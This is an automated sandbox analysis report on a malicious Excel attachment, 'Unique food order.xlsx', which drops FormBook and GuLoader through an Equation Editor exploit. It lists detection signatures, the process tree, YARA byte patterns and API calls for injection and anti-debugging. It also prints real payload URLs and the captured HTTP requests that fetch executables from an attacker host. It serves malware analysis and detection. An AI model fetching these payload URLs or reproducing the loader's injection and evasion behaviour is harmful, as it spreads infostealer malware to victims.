
Analysis Report Unique food order.xlsx

Overview

General Information

Sample Name: Unique food order.xlsx
Analysis ID: 320235
MD5: f2cd263042fce1a4c2cbeed5f1676429
SHA1: 608334d6c55e50f3447f865bca59e05b7b60e0cb
SHA256: f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
Tags: VelvetSweatshop, xlsx

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2408 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autoconv.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 09D786401F6CA6AEB16B2811B169F944)
          • NAPSTAT.EXE (PID: 1840 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2692
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2692
Sigma detected: Execution in Non-Executable Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2692
Sigma detected: Suspicious Program Location Process Starts
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2692

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Unique food order.xlsx; Virustotal: Detection: 24%
Source: Unique food order.xlsx; ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match; File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Code function: 4x nop then pop esi
Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 19 Nov 2020 06:43:17 GMT | Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | Last-Modified: Wed, 18 Nov 2020 21:48:32 GMT | ETag: "f000-5b4689298b6b3" | Accept-Ranges: bytes | Content-Length: 61440 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: Joe Sandbox View; ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global traffic; HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 103.125.191.5 | Cache-Control: no-cache
Source: C:\Users\Public\vbc.exe; Code function: 5_2_001B5F9F InternetReadFile,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp; String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp; String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown; DNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://%s.com
Source: vbc.exe; String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp; String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp; String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://treyresearch.net
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11; Author: Florian Roth
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
      Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031044B EnumWindows,NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315A6C NtProtectVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315336 NtSetInformationThread,LoadLibraryA,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031232A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315F9F NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315435 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00316039 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00316015 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00312455 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003104B2 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003124BD NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00316089 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003160D1 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003104CD NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00312531 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00310537 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00310516 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00316106 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031059D NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003161ED NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003105D9 NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00316239 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031260D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003162C5 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00316325 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00312705 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00310F7D NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031276A NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315FE5 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003147EF NtSetInformationThread,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003123D5 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315FC1 NtResumeThread,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E9900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E990048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FE24 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FFFC NtCreateProcessEx,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FF34 NtQueueApcThread,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FC30 NtOpenProcess,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FC48 NtSetInformationFile,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E990C40 NtGetContextThread,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E991D80 NtSuspendThread,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FD5C NtEnumerateKey,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FAB8 NtQueryValueKey,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FA20 NtQueryInformationFile,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FA50 NtEnumerateValueKey,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FBE8 NtQueryVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98FB50 NtCreateKey,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98F8CC NtWaitForSingleObject,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98F9F0 NtClose,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E98F938 NtWriteFile,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E991930 NtSetContextThread,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E9907AC NtCreateMutant,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E9910D0 NtOpenProcessToken,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E990060 NtQuerySection,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E9901D4 NtSetValueKey,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E99010C NtOpenDirectoryObject,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E991148 NtOpenThread,
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5A6C NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B07AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AF900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AF9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B0048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B0060 NtQuerySection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B0078 NtResumeThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B10D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B1148 NtOpenThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B01D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFB50 NtCreateKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFBB8 NtQueryInformationToken,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AF8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AF938 NtWriteFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B1930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFFB4 NtCreateSection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFFFC NtCreateProcessEx,
